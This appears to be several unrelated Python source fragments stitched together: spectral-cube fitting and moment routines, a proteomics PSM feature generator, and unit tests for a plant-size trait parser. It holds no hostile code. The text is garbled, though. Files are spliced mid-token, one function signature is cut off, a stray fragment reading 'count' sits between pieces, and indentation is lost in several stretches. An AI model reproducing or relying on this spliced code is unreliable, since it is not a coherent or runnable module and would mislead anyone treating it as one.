if hasattr(sp.specfit, 'mpfit_status'):
log.exception("mpfit status is {0}".format(sp.specfit.mpfit_status))
log.exception("The problem is that the model errors were never set, "
"which implies that the fit simply failed to finish.")
log.exception("The string representation of `sp.specfit.parinfo` is: {0}"
.format(sp.specfit.parinfo))
log.exception("The string representation of `sp.specfit.fitter.parinfo` is: {0}"
.format(sp.specfit.fitter.parinfo))
log.exception("modelpars is: {0}".format(str(sp.specfit.modelpars)))
log.exception("cube modelpars are: {0}".format(str(self.parcube[:,int(y),int(x)])))
log.exception("cube modelerrs are: {0}".format(str(self.errcube[:,int(y),int(x)])))
log.exception("Guesses were: {0}".format(str(gg)))
log.exception("Fitkwargs were: {0}".format(str(fitkwargs)))
if skip_failed_fits:
# turn the flag into a count
log.exception("The fit never completed; something has gone wrong. Failed fits = {0}".format(int(skip_failed_fits)))
else:
raise TypeError("The fit never completed; something has gone wrong.")
# blank out the errors (and possibly the values) wherever they are zero = assumed bad
# this is done after the above exception to make sure we can inspect these values
if blank_value != 0:
self.parcube[self.parcube == 0] = blank_value
self.errcube[self.parcube == 0] = blank_value
if integral:
return ((x,y), sp.specfit.modelpars, sp.specfit.modelerrs,
self.integralmap[:,int(y),int(x)])
else:
return ((x,y), sp.specfit.modelpars, sp.specfit.modelerrs)
#### BEGIN TEST BLOCK ####
# This test block is to make sure you don't run a 30 hour fitting
# session that's just going to crash at the end.
# try a first fit for exception-catching
if len(start_from_point) == 2:
try0 = fit_a_pixel((0,start_from_point[0], start_from_point[1]))
else:
try0 = fit_a_pixel((0,valid_pixels[0][0],valid_pixels[0][1]))
try:
len_guesses = len(self.momentcube) if (usemomentcube or
guesses_are_moments) else len(guesses)
assert len(try0[1]) == len_guesses == len(self.parcube) == len(self.errcube)
assert len(try0[2]) == len_guesses == len(self.parcube) == len(self.errcube)
except TypeError as ex:
if try0 is None:
raise AssertionError("The first fitted pixel did not yield a "
"fit. Please try starting from a "
"different pixel.")
else:
raise ex
except AssertionError:
raise AssertionError("The first pixel had the wrong fit "
"parameter shape. This is probably "
"a bug; please report it.")
# This is a secondary test... I'm not sure it's necessary, but it
# replicates what's inside the fit_a_pixel code and so should be a
# useful sanity check
x,y = valid_pixels[0]
sp = self.get_spectrum(x,y)
sp.specfit.Registry = self.Registry # copy over fitter registry
# this reproduced code is needed because the functional wrapping
# required for the multicore case prevents gg from being set earlier
if usemomentcube or guesses_are_moments:
gg = self.momentcube[:,int(y),int(x)]
elif hasattr(guesses,'shape') and guesses.shape[1:] == self.cube.shape[1:]:
gg = guesses[:,int(y),int(x)]
else:
gg = guesses
# This is NOT in a try/except block because we want to raise the
# exception here if an exception is going to happen
sp.specfit(guesses=gg, **fitkwargs)
if prevalidate_guesses:
if guesses.ndim == 3:
for ii,(x,y) in ProgressBar(tuple(enumerate(valid_pixels))):
pinf, _ = sp.specfit.fitter._make_parinfo(parvalues=guesses[:,int(y),int(x)], **fitkwargs)
sp.specfit._validate_parinfo(pinf, 'raise')
else:
pinf, _ = sp.specfit.fitter._make_parinfo(parvalues=guesses, **fitkwargs)
sp.specfit._validate_parinfo(pinf, 'raise')
#### END TEST BLOCK ####
if multicore > 1:
sequence = [(ii,x,y) for ii,(x,y) in tuple(enumerate(valid_pixels))]
with np.errstate(divide='raise'):
result = parallel_map(fit_a_pixel, sequence, numcores=multicore)
self._result = result # backup - don't want to lose data in the case of a failure
# a lot of ugly hacking to deal with the way parallel_map returns
# its results needs TWO levels of None-filtering, because any
# individual result can be None (I guess?) but apparently (and this
# part I don't believe) any individual *fit* result can be None as
# well (apparently the x,y pairs can also be None?)
merged_result = [core_result for core_result in result if
core_result is not None]
# for some reason, every other time I run this code, merged_result
# ends up with a different intrinsic shape. This is an attempt to
# force it to maintain a sensible shape.
try:
if integral:
((x,y), m1, m2, intgl) = merged_result[0]
else:
((x,y), m1, m2) = merged_result[0]
except ValueError:
if verbose > 1:
log.exception("ERROR: merged_result[0] is {0} which has the"
" wrong shape".format(merged_result[0]))
merged_result = itertools.chain.from_iterable(merged_result)
for TEMP in merged_result:
if TEMP is None:
# this shouldn't be possible, but it appears to happen
# anyway. parallel_map is great, up to a limit that was
# reached long before this level of complexity
log.debug("Skipped a None entry: {0}".format(str(TEMP)))
continue
try:
if integral:
((x,y), modelpars, modelerrs, intgl) = TEMP
else:
((x,y), modelpars, modelerrs) = TEMP
except TypeError:
# implies that TEMP does not have the shape ((a,b),c,d)
# as above, shouldn't be possible, but it happens...
log.debug("Skipped a misshapen entry: {0}".format(str(TEMP)))
continue
if ((len(modelpars) != len(modelerrs)) or
(len(modelpars) != len(self.parcube))):
raise ValueError("There was a serious problem; modelpar and"
" error shape don't match that of the "
"parameter cubes")
if ((any([x is None for x in modelpars]) or
np.any(np.isnan(modelpars)) or
any([x is None for x in modelerrs]) or
np.any(np.isnan(modelerrs)))):
self.parcube[:,int(y),int(x)] = np.nan
self.errcube[:,int(y),int(x)] = np.nan
self.has_fit[int(y),int(x)] = False
else:
self.parcube[:,int(y),int(x)] = modelpars
self.errcube[:,int(y),int(x)] = modelerrs
self.has_fit[int(y),int(x)] = max(modelpars) > 0
if integral:
self.integralmap[:,int(y),int(x)] = intgl
else:
for ii,(x,y) in enumerate(valid_pixels):
fit_a_pixel((ii,x,y))
# March 27, 2014: This is EXTREMELY confusing. This isn't in a loop...
# make sure the fitter / fittype are set for the cube
# this has to be done within the loop because skipped-over spectra
# don't ever get their fittypes set
self.specfit.fitter = sp.specfit.fitter
self.specfit.fittype = sp.specfit.fittype
self.specfit.parinfo = sp.specfit.parinfo
if verbose:
log.info("Finished final fit %i. "
"Elapsed time was %0.1f seconds" % (len(valid_pixels), time.time()-t0))
pars_are_finite = np.all(np.isfinite(self.parcube), axis=0)
# if you see one of these exceptions, please try to produce a minimum
# working example and report it as a bug.
# all non-finite fit parameters should be has_fit=False
assert np.all(~self.has_fit[~pars_are_finite]), "Non-finite parameters found in fits"
def momenteach(self, verbose=True, verbose_level=1, multicore=1, **kwargs):
    """
    Return a cube of the moments of each pixel

    Parameters
    ----------
    multicore: int
        if >1, try to use multiprocessing via parallel_map to run on multiple cores
    """
    # make sure the 2D "plane" used to select valid pixels exists
    if not hasattr(self.mapplot,'plane'):
        self.mapplot.makeplane()
    # moments are computed without a baseline height term unless requested
    if 'vheight' not in kwargs:
        kwargs['vheight'] = False
    yy,xx = np.indices(self.mapplot.plane.shape)
    # valid pixels: unmasked / finite plane values that are also in maskmap
    if isinstance(self.mapplot.plane, np.ma.core.MaskedArray):
        OK = (~self.mapplot.plane.mask) * self.maskmap
    else:
        OK = np.isfinite(self.mapplot.plane) * self.maskmap
    # NOTE: zip() yields a one-shot iterator on py3; it is consumed exactly
    # once below (either in the multicore branch or the serial loop)
    valid_pixels = zip(xx[OK],yy[OK])
    # run the moment process to find out how many elements are in a moment
    # NOTE(review): arguments here are (yy, xx) while moment_a_pixel below
    # calls get_spectrum(x, y) -- looks like a swapped argument order;
    # confirm against get_spectrum's signature
    _temp_moment = self.get_spectrum(yy[OK][0],xx[OK][0]).moments(**kwargs)
    self.momentcube = np.zeros((len(_temp_moment),)+self.mapplot.plane.shape)
    t0 = time.time()
    def moment_a_pixel(iixy):
        # compute and store the moments of one (x, y) pixel; returns
        # ((x, y), moments) so multiprocessing workers can report results
        ii,x,y = iixy
        sp = self.get_spectrum(x,y)
        self.momentcube[:,int(y),int(x)] = sp.moments(**kwargs)
        if verbose:
            # higher verbose_level -> more frequent progress messages
            if ii % 10**(3-verbose_level) == 0:
                log.info("Finished moment %i. "
                         "Elapsed time is %0.1f seconds" % (ii, time.time()-t0))
        return ((x,y), self.momentcube[:,int(y),int(x)])
    if multicore > 1:
        sequence = [(ii,x,y) for ii,(x,y) in tuple(enumerate(valid_pixels))]
        result = parallel_map(moment_a_pixel, sequence, numcores=multicore)
        # drop failed (None) worker results; .tolist() presumably converts
        # array-like worker returns -- confirm parallel_map's return type
        merged_result = [core_result.tolist()
                         for core_result in result
                         if core_result is not None]
        # write the moments computed in the workers back into the parent's
        # momentcube (worker writes happen in separate processes)
        for TEMP in merged_result:
            ((x,y), moments) = TEMP
            self.momentcube[:,int(y),int(x)] = moments
    else:
        for ii,(x,y) in enumerate(valid_pixels):
            moment_a_pixel((ii,x,y))
    if verbose:
        log.info("Finished final moment %i. "
                 "Elapsed time was %0.1f seconds" % (OK.sum(), time.time()-t0))
def show_moment(self, momentnumber, **kwargs):
    """
    Display a previously computed moment map in the ``mapplot`` window.

    Parameters
    ----------
    momentnumber : int
        Index into the first axis of ``self.momentcube``.

    Raises
    ------
    ValueError
        If moments have not been computed yet (no ``momentcube`` attribute).
    """
    if not hasattr(self, 'momentcube'):
        raise ValueError("Compute moments first")
    plane = self.momentcube[momentnumber, :, :].squeeze()
    self.mapplot.plane = plane
    self.mapplot(estimator=None, **kwargs)
def show_fit_param(self, parnumber, **kwargs):
    """
    Display a fitted-parameter map in the ``mapplot`` window.

    Parameters
    ----------
    parnumber : int
        The index of the parameter in the parameter cube.

    Raises
    ------
    ValueError
        If no fit has been run yet (no ``parcube`` attribute).
    """
    if not hasattr(self, 'parcube'):
        raise ValueError("Compute fit parameters first")
    plane = self.parcube[parnumber, :, :].squeeze()
    self.mapplot.plane = plane
    self.mapplot(estimator=None, **kwargs)
def load_model_fit(self, fitsfilename, npars, npeaks=1, fittype=None,
_temp_fit_loc=(0,0)):
"""
Load a parameter + error cube into the ``.parcube`` and ``.errcube``
attributes. The models can then be examined and plotted using
``.mapplot`` as if you had run ``.fiteach``.
Parameters
----------
fitsfilename : str
The filename containing the parameter cube written with `write_fit`
npars : int
The number of parameters in the model fit for a single spectrum
npeaks : int
The number of independent peaks fit toward each spectrum
fittype : str, | |
count
def generate_Prophet_features_sip_diff(lPsm, config_dict):
    """
    Compute PeptideProphet-style sibling/count features for every PSM in
    ``lPsm`` (SIP variant) and store them on the PSM objects in place
    (``NMC``, ``IPSC``, ``OPSC``, ``UPSC``, ``SPSC``, ``PPC``, ``UPPC``,
    ``SPPC``).

    Args:
        lPsm: list of PSM objects (project type), read and mutated in place.
        config_dict: configuration mapping; the cleavage-residue entries are
            used to count missed cleavage sites.
    """
    # get some statistics
    global num_forward_psms_before_filtering
    num_forward_psms_before_filtering = 0
    for one_psm in lPsm:
        if one_psm.RealLabel == LabelFwd:
            num_forward_psms_before_filtering += 1
    # very large, mostly-forward datasets switch to a simplified SPSC below
    simple_feature_bool = False
    if float(num_forward_psms_before_filtering)/float(len(lPsm)) > 0.7 and len(lPsm) > 1500000:
        simple_feature_bool = True
    # peptide with PTM dictionary is for IPSC, identified peptide
    peptide_with_modification_dict = {}
    # peptide without PTM dictionary is for OPSC, original peptide
    peptide_dict = {}
    # original peptide -> list of all proteins it maps to (union over PSMs)
    peptide_protein_dict = {}
    # psm_set = Set()
    for oPsm in lPsm:
        # number of missed cleavage sites, from the configured protease rules
        oPsm.NMC = get_num_missed_cleavage_sites(oPsm.OriginalPeptide,
                                                 config_dict[pep_iden_str + cleave_after_residues_str],
                                                 config_dict[pep_iden_str + cleave_before_residues_str])
        # collect the pct_s of every PSM sharing this identified peptide
        if oPsm.IdentifiedPeptide in peptide_with_modification_dict:
            peptide_with_modification_dict[oPsm.IdentifiedPeptide].append(oPsm.pct_s)
        else:
            peptide_with_modification_dict[oPsm.IdentifiedPeptide] = [oPsm.pct_s]
        if oPsm.OriginalPeptide in peptide_protein_dict:
            pro_list = peptide_protein_dict[oPsm.OriginalPeptide]
            for protein in oPsm.protein_list:
                if protein not in pro_list:
                    pro_list.append(protein)
        else:
            pro_list = []
            for pro in oPsm.protein_list:
                if pro not in pro_list:
                    pro_list.append(pro)
            peptide_protein_dict[oPsm.OriginalPeptide] = pro_list
    # strip everything except word chars and brackets so that PTM variants
    # of the same peptide collapse onto one key
    pattern = re.compile('[^\w\[\]]')
    # NOTE: dict.iteritems() implies this module targets Python 2
    for key, _value in peptide_with_modification_dict.iteritems():
        peptide_str = pattern.sub('', key)
        if peptide_str in peptide_dict:
            # peptide_dict[peptide_str] += 1
            peptide_dict[peptide_str] += _value
        else:
            # peptide_dict[peptide_str] = 1
            peptide_dict[peptide_str] = _value
    # # sibling peptides
    pro_unique_dict = {}  # number of unique peptides of a protein
    pro_shared_dict = {}  # number of shared peptides of a protein
    # debug
    pro_balanced_shared_dict = {}  # shared counts weighted by 1/#proteins
    # debug
    num_changed = 0
    changed_flag = False
    # psm_set.clear()
    pro_pep_dict = {}         # protein -> all of its peptides
    pro_unique_pep_dict = {}  # protein -> peptides mapping only to it
    pro_shared_pep_dict = {}  # protein -> peptides shared with others
    for oPsm in lPsm:
        pro_list = peptide_protein_dict[oPsm.OriginalPeptide]
        changed_flag = False
        print_flag = True  # debug switch: set False to print sync details
        # sync this PSM's protein list with the union collected above
        for protein in pro_list:
            if not protein in oPsm.protein_list:
                changed_flag = True
                if not print_flag:
                    print(pro_list)
                    print(oPsm.protein_list)
                    print_flag = True
                oPsm.protein_list.append(protein)
        # sanity check: both lists should now have the same length
        if len(oPsm.protein_list) != len(pro_list):
            print('check 4')
            print(oPsm.protein_list)
            print(pro_list)
            exit(1)
        if changed_flag:
            # protein membership grew; refresh derived name/label fields
            oPsm.set_protein_names()
            oPsm.RealLabel = get_protein_type(oPsm.ProteinNames)
            # print(oPsm.OriginalPeptide)
            num_changed += 1
        # count this PSM as shared (several proteins) or unique (one protein)
        if len(pro_list) > 1:
            num_pro_float = float(len(pro_list))
            for protein in pro_list:
                if protein in pro_shared_dict:
                    pro_shared_dict[protein] += 1
                else:
                    pro_shared_dict[protein] = 1
                # debug
                if protein in pro_balanced_shared_dict:
                    pro_balanced_shared_dict[protein] += 1.0/num_pro_float
                else:
                    pro_balanced_shared_dict[protein] = 1.0/num_pro_float
                # debug
        else:
            if pro_list[0] in pro_unique_dict:
                pro_unique_dict[pro_list[0]] += 1
            else:
                pro_unique_dict[pro_list[0]] = 1
        # record the peptide under each of its proteins
        for pro in pro_list:
            if pro in pro_pep_dict:
                l = pro_pep_dict[pro]
                if oPsm.OriginalPeptide not in l:
                    l.append(oPsm.OriginalPeptide)
            else:
                l = []
                l.append(oPsm.OriginalPeptide)
                pro_pep_dict[pro] = l
        if len(pro_list) == 1:
            if pro_list[0] in pro_unique_pep_dict:
                l = pro_unique_pep_dict[pro_list[0]]
                if oPsm.OriginalPeptide not in l:
                    l.append(oPsm.OriginalPeptide)
            else:
                l = []
                l.append(oPsm.OriginalPeptide)
                pro_unique_pep_dict[pro_list[0]] = l
        else:
            for pro in pro_list:
                if pro in pro_shared_pep_dict:
                    l = pro_shared_pep_dict[pro]
                    if oPsm.OriginalPeptide not in l:
                        l.append(oPsm.OriginalPeptide)
                else:
                    l = []
                    l.append(oPsm.OriginalPeptide)
                    pro_shared_pep_dict[pro] = l
    if num_changed != 0:
        if not print_flag:
            print("num changed %d" % num_changed)
    # collect features
    num_unique_per_pro = 0
    num_shared_per_pro = 0
    num_balanced_shared_per_pro = 0
    max_unique_per_psm = 0
    max_shared_per_psm = 0
    max_balanced_shared_per_psm = 0
    num_unique_per_psm = 0
    num_shared_per_psm = 0
    num_balanced_shared_per_psm = 0
    max_per_psm = 0  # linked to protein
    max_balanced_per_psm = 0  # linked to a protein
    max_linked_unique_per_psm = 0
    max_linked_shared_per_psm = 0
    max_linked_balanced_unique_per_psm = 0
    max_linked_balanced_shared_per_psm = 0
    for oPsm in lPsm:
        # per-peptide spectral counts (PTM-aware and PTM-stripped)
        oPsm.IPSC = peptide_with_modification_dict[oPsm.IdentifiedPeptide]
        oPsm.OPSC = peptide_dict[oPsm.OriginalPeptide]
        # reset per-PSM accumulators
        max_unique_per_psm = 0
        max_shared_per_psm = 0
        max_balanced_shared_per_psm = 0
        num_unique_per_psm = 0
        num_shared_per_psm = 0
        num_balanced_shared_per_psm = 0
        max_per_psm = 0  # linked to protein
        max_balanced_per_psm = 0  # linked to a protein
        max_linked_unique_per_psm = 0
        max_linked_shared_per_psm = 0
        max_linked_balanced_unique_per_psm = 0
        max_linked_balanced_shared_per_psm = 0
        pro_list = peptide_protein_dict[oPsm.OriginalPeptide]
        for protein in pro_list:
            # peptide counts of the best (largest) protein this PSM maps to
            if len(pro_pep_dict[protein]) > oPsm.PPC:
                oPsm.PPC = len(pro_pep_dict[protein])
            if len(pro_list) == 1 and len(pro_unique_pep_dict[protein]) > oPsm.UPPC:
                oPsm.UPPC = len(pro_unique_pep_dict[protein])
            if len(pro_list) > 1 and len(pro_shared_pep_dict[protein]) > oPsm.SPPC:
                oPsm.SPPC = len(pro_shared_pep_dict[protein])
            num_unique_per_pro = 0
            num_shared_per_pro = 0
            num_balanced_shared_per_pro = 0
            # sibling counts exclude this PSM's own contribution
            if protein in pro_unique_dict:
                num_unique_per_pro = pro_unique_dict[protein]
                if len(pro_list) == 1:
                    # pass
                    num_unique_per_pro -= 1
            if protein in pro_shared_dict:
                num_shared_per_pro = pro_shared_dict[protein]
                if len(pro_list) > 1:
                    # pass
                    num_shared_per_pro -= 1
            if protein in pro_balanced_shared_dict:
                num_balanced_shared_per_pro = pro_balanced_shared_dict[protein]
                if len(pro_list) > 1:
                    num_balanced_shared_per_pro -= 1.0/ float(len(pro_list))
            if num_unique_per_pro > max_unique_per_psm:
                max_unique_per_psm = num_unique_per_pro
            if num_shared_per_pro > max_shared_per_psm:
                max_shared_per_psm = num_shared_per_pro
            # remember the counts of the protein with the most total PSMs
            if num_unique_per_pro + num_shared_per_pro > max_per_psm:
                max_per_psm = num_unique_per_pro + num_shared_per_pro
                max_linked_unique_per_psm = num_unique_per_pro
                max_linked_shared_per_psm = num_shared_per_pro
            num_unique_per_psm += num_unique_per_pro
            num_shared_per_psm += num_shared_per_pro
            if num_balanced_shared_per_pro > max_balanced_shared_per_psm:
                max_balanced_shared_per_psm = num_balanced_shared_per_pro
            if num_unique_per_pro + num_balanced_shared_per_pro > max_balanced_per_psm:
                max_balanced_per_psm = num_unique_per_pro + num_balanced_shared_per_pro
                max_linked_balanced_unique_per_psm = num_unique_per_pro
                max_linked_balanced_shared_per_psm = num_balanced_shared_per_pro
            num_balanced_shared_per_psm += num_balanced_shared_per_pro
        # NOTE(review): the next five assignments overwrite each other; only
        # the last value of each attribute survives -- looks like leftover
        # experiments with alternative feature definitions
        oPsm.UPSC = num_unique_per_psm
        oPsm.SPSC = num_shared_per_psm
        oPsm.SPSC = num_unique_per_psm + num_shared_per_psm
        oPsm.UPSC = max_unique_per_psm
        oPsm.SPSC = max_shared_per_psm
        # final UPSC: 1 if the PSM maps to a single protein, else 0
        if len(oPsm.protein_list) == 1:
            oPsm.UPSC = 1
        else:
            oPsm.UPSC = 0
        # final SPSC: sibling counts of the best-linked protein
        if simple_feature_bool:
            oPsm.SPSC = max_linked_unique_per_psm
        else:
            oPsm.SPSC = max_linked_unique_per_psm + max_linked_shared_per_psm
## collect spectrum and protein level features
def generate_Prophet_features_test(lPsm, config_dict):
# get some statistics
global num_forward_psms_before_filtering
num_forward_psms_before_filtering = 0
for one_psm in lPsm:
if one_psm.RealLabel == LabelFwd:
num_forward_psms_before_filtering += 1
simple_feature_bool = False
if float(num_forward_psms_before_filtering)/float(len(lPsm)) > 0.7 and len(lPsm) > 1500000:
simple_feature_bool = True
if config_dict[pep_iden_str + search_type_str] == 'SIP':
simple_feature_bool = False
# peptide with PTM dictionary is for IPSC
peptide_with_modification_dict = {}
# peptide without PTM dictionary is for OPSC
peptide_dict = {}
peptide_protein_dict = {}
# psm_set = Set()
for oPsm in lPsm:
oPsm.NMC = get_num_missed_cleavage_sites(oPsm.OriginalPeptide,
config_dict[pep_iden_str + cleave_after_residues_str],
config_dict[pep_iden_str + cleave_before_residues_str])
if oPsm.IdentifiedPeptide in peptide_with_modification_dict:
peptide_with_modification_dict[oPsm.IdentifiedPeptide] += 1
else:
peptide_with_modification_dict[oPsm.IdentifiedPeptide] = 1
if oPsm.OriginalPeptide in peptide_protein_dict:
pro_list = peptide_protein_dict[oPsm.OriginalPeptide]
for protein in oPsm.protein_list:
if protein not in pro_list:
pro_list.append(protein)
else:
pro_list = []
for pro in oPsm.protein_list:
if pro not in pro_list:
pro_list.append(pro)
peptide_protein_dict[oPsm.OriginalPeptide] = pro_list
pattern = re.compile('[^\w\[\]]')
for key, _value in peptide_with_modification_dict.iteritems():
peptide_str = pattern.sub('', key)
if peptide_str in peptide_dict:
# peptide_dict[peptide_str] += 1
peptide_dict[peptide_str] += _value
else:
# peptide_dict[peptide_str] = 1
peptide_dict[peptide_str] = _value
# # sibling peptides
pro_unique_dict = {} # number of unique peptide of a protain
pro_shared_dict = {} # number of shared peptide of a protain
# debug
pro_balanced_shared_dict = {}
# debug
num_changed = 0
changed_flag = False
# psm_set.clear()
pro_pep_dict = {}
pro_unique_pep_dict = {}
pro_shared_pep_dict = {}
for oPsm in lPsm:
pro_list = peptide_protein_dict[oPsm.OriginalPeptide]
'''
if len(oPsm.protein_list) != len(pro_list):
print('check 3')
print(oPsm.protein_list)
print(pro_list)
'''
changed_flag = False
print_flag = True
for protein in pro_list:
if not protein in oPsm.protein_list:
changed_flag = True
if not print_flag:
print(pro_list)
print(oPsm.protein_list)
print_flag = True
oPsm.protein_list.append(protein)
if len(oPsm.protein_list) != len(pro_list):
print('check 4')
print(oPsm.protein_list)
print(pro_list)
exit(1)
if changed_flag:
oPsm.set_protein_names()
oPsm.RealLabel = get_protein_type(oPsm.ProteinNames)
# print(oPsm.OriginalPeptide)
num_changed += 1
'''
unique_id_str = oPsm.FileName + '_' + str(oPsm.ScanNumber) + '_' + oPsm.IdentifiedPeptide
if unique_id_str in psm_set:
continue
else:
psm_set.add(unique_id_str)
'''
if len(pro_list) > 1:
num_pro_float = float(len(pro_list))
for protein in pro_list:
if protein in pro_shared_dict:
pro_shared_dict[protein] += 1
else:
pro_shared_dict[protein] = 1
# debug
if protein in pro_balanced_shared_dict:
pro_balanced_shared_dict[protein] += 1.0/num_pro_float
else:
pro_balanced_shared_dict[protein] = 1.0/num_pro_float
# debug
else:
if pro_list[0] in pro_unique_dict:
pro_unique_dict[pro_list[0]] += 1
else:
pro_unique_dict[pro_list[0]] = 1
for pro in pro_list:
if pro in pro_pep_dict:
l = pro_pep_dict[pro]
if oPsm.OriginalPeptide not in l:
l.append(oPsm.OriginalPeptide)
else:
l = []
l.append(oPsm.OriginalPeptide)
pro_pep_dict[pro] = l
if len(pro_list) == 1:
if pro_list[0] in pro_unique_pep_dict:
l = pro_unique_pep_dict[pro_list[0]]
if oPsm.OriginalPeptide not in l:
l.append(oPsm.OriginalPeptide)
else:
l = []
l.append(oPsm.OriginalPeptide)
pro_unique_pep_dict[pro_list[0]] = l
else:
for pro in pro_list:
if pro in pro_shared_pep_dict:
l = pro_shared_pep_dict[pro]
if oPsm.OriginalPeptide not in l:
l.append(oPsm.OriginalPeptide)
else:
l = []
l.append(oPsm.OriginalPeptide)
pro_shared_pep_dict[pro] = l
if num_changed != 0:
if not print_flag:
print("num changed %d" % num_changed)
# collect features
num_unique_per_pro = 0
num_shared_per_pro = 0
num_balanced_shared_per_pro = 0
max_unique_per_psm = 0
max_shared_per_psm = 0
max_balanced_shared_per_psm = 0
num_unique_per_psm = 0
num_shared_per_psm = 0
num_balanced_shared_per_psm = 0
max_per_psm = 0 # linked to protein
max_balanced_per_psm = 0 # linked to a protein
max_linked_unique_per_psm = 0
max_linked_shared_per_psm = 0
max_linked_balanced_unique_per_psm = 0
max_linked_balanced_shared_per_psm = 0
for oPsm in lPsm:
oPsm.IPSC = peptide_with_modification_dict[oPsm.IdentifiedPeptide]
oPsm.OPSC = peptide_dict[oPsm.OriginalPeptide]
max_unique_per_psm = 0
max_shared_per_psm = 0
max_balanced_shared_per_psm = 0
num_unique_per_psm = 0
num_shared_per_psm = 0
num_balanced_shared_per_psm = 0
max_per_psm = 0 # linked to | |
# tests/patterns/test_size_.py
"""Test plant size trait matcher."""
# pylint: disable=missing-function-docstring, too-many-public-methods
import unittest
from tests.setup import test
class TestSize(unittest.TestCase):
"""Test plant size trait parsers."""
# def test_size_00(self):
# test('Leaf (12-)23-34 × 45-56 cm wide')
def test_size_01(self):
    """Cross size: length range with atypical-range prefix, width range, trailing units."""
    actual = test('Leaf (12-)23-34 × 45-56 cm')
    expected = [
        {'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
        {'length_min': 12.0,
         'length_low': 23.0,
         'length_high': 34.0,
         'length_units': 'cm',
         'trait': 'size',
         'start': 5,
         'end': 15,
         'part': 'leaf'},
        {'width_low': 45.0,
         'width_high': 56.0,
         'width_units': 'cm',
         'trait': 'size',
         'start': 18,
         'end': 23,
         'part': 'leaf'},
        {'units': 'cm', 'trait': 'units', 'start': 24, 'end': 26},
    ]
    self.assertEqual(actual, expected)
def test_size_02(self):
    """A cross without units yields only the part trait."""
    actual = test('leaf (12-)23-34 × 45-56')
    expected = [{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4}]
    self.assertEqual(actual, expected)
def test_size_03(self):
    """Length range with a parenthesized maximum."""
    actual = test('blade 1.5–5(–7) cm')
    expected = [
        {'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 5},
        {'length_low': 1.5,
         'length_high': 5.0,
         'length_max': 7.0,
         'length_units': 'cm',
         'trait': 'size',
         'start': 6,
         'end': 15,
         'part': 'leaf'},
        {'units': 'cm', 'trait': 'units', 'start': 16, 'end': 18},
    ]
    self.assertEqual(actual, expected)
def test_size_04(self):
    """A lobed description parses as a count, not a size."""
    actual = test('leaf shallowly to deeply 5–7-lobed')
    expected = [
        {'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
        {'low': 5, 'high': 7, 'trait': 'count',
         'start': 25, 'end': 28, 'part': 'leaf', 'subpart': 'lobe'},
        {'subpart': 'lobe', 'trait': 'subpart',
         'start': 29, 'end': 34, 'part': 'leaf'},
    ]
    self.assertEqual(actual, expected)
def test_size_05(self):
    """An explicit dimension word ('wide') turns the range into a width."""
    actual = test('leaf 4–10 cm wide')
    expected = [
        {'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
        {'width_low': 4.0,
         'width_high': 10.0,
         'width_units': 'cm',
         'trait': 'size',
         'start': 5,
         'end': 9,
         'part': 'leaf'},
        {'units': 'cm', 'trait': 'units', 'start': 10, 'end': 12},
        {'dimension': 'width', 'trait': 'dimension', 'start': 13, 'end': 17},
    ]
    self.assertEqual(actual, expected)
def test_size_06(self):
    """Fractions with a part-as-location phrase produce no size trait."""
    actual = test('leaf sinuses 1/5–1/4 to base')
    expected = [
        {'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
        {'subpart': 'sinus',
         'trait': 'subpart',
         'start': 5,
         'end': 12,
         'part': 'leaf'},
        {'part_as_loc': 'to base',
         'trait': 'part_as_loc',
         'start': 21,
         'end': 28,
         'part': 'leaf',
         'subpart': 'sinus'},
    ]
    self.assertEqual(actual, expected)
def test_size_07(self):
    """A simple length range in millimeters."""
    actual = test('petiolules 2–5 mm')
    expected = [
        {'part': 'petiolule', 'trait': 'part', 'start': 0, 'end': 10},
        {'length_low': 2.0,
         'length_high': 5.0,
         'length_units': 'mm',
         'trait': 'size',
         'start': 11,
         'end': 14,
         'part': 'petiolule'},
        {'units': 'mm', 'trait': 'units', 'start': 15, 'end': 17},
    ]
    self.assertEqual(actual, expected)
def test_size_08(self):
    """Two sized parts separated by a margin-shape clause."""
    actual = test('petiolules 2–5 mm; coarsely serrate; petioles 16–28 mm.')
    expected = [
        {'part': 'petiolule', 'trait': 'part', 'start': 0, 'end': 10},
        {'length_low': 2.0,
         'length_high': 5.0,
         'length_units': 'mm',
         'trait': 'size',
         'start': 11,
         'end': 14,
         'part': 'petiolule'},
        {'units': 'mm', 'trait': 'units', 'start': 15, 'end': 17},
        {'margin_shape': 'serrate',
         'trait': 'margin_shape',
         'start': 19,
         'end': 35,
         'part': 'petiole'},
        {'part': 'petiole', 'trait': 'part', 'start': 37, 'end': 45},
        {'length_low': 16.0,
         'length_high': 28.0,
         'length_units': 'mm',
         'trait': 'size',
         'start': 46,
         'end': 51,
         'part': 'petiole'},
        {'units': 'mm', 'trait': 'units', 'start': 52, 'end': 54},
    ]
    self.assertEqual(actual, expected)
def test_size_09(self):
    """A nested part ('petiole') takes the size, not the leading 'Leaves'."""
    actual = test('Leaves: petiole 2–15 cm;')
    expected = [
        {'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 6},
        {'part': 'petiole', 'trait': 'part', 'start': 8, 'end': 15},
        {'length_low': 2.0,
         'length_high': 15.0,
         'length_units': 'cm',
         'trait': 'size',
         'start': 16,
         'end': 20,
         'part': 'petiole'},
        {'units': 'cm', 'trait': 'units', 'start': 21, 'end': 23},
    ]
    self.assertEqual(actual, expected)
def test_size_10(self):
    """Square-bracketed min/max values around the main range."""
    actual = test('petiole [5–]7–25[–32] mm, glabrous,')
    expected = [
        {'part': 'petiole', 'trait': 'part', 'start': 0, 'end': 7},
        {'length_min': 5.0,
         'length_low': 7.0,
         'length_high': 25.0,
         'length_max': 32.0,
         'length_units': 'mm',
         'trait': 'size',
         'start': 8,
         'end': 21,
         'part': 'petiole'},
        {'units': 'mm', 'trait': 'units', 'start': 22, 'end': 24},
    ]
    self.assertEqual(actual, expected)
def test_size_11(self):
    """A cross where each side carries its own units."""
    actual = test('leaf 2–4 cm × 2–10 mm')
    expected = [
        {'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
        {'length_low': 2.0,
         'length_high': 4.0,
         'length_units': 'cm',
         'trait': 'size',
         'start': 5,
         'end': 8,
         'part': 'leaf'},
        {'units': 'cm', 'trait': 'units', 'start': 9, 'end': 11},
        {'width_low': 2.0,
         'width_high': 10.0,
         'width_units': 'mm',
         'trait': 'size',
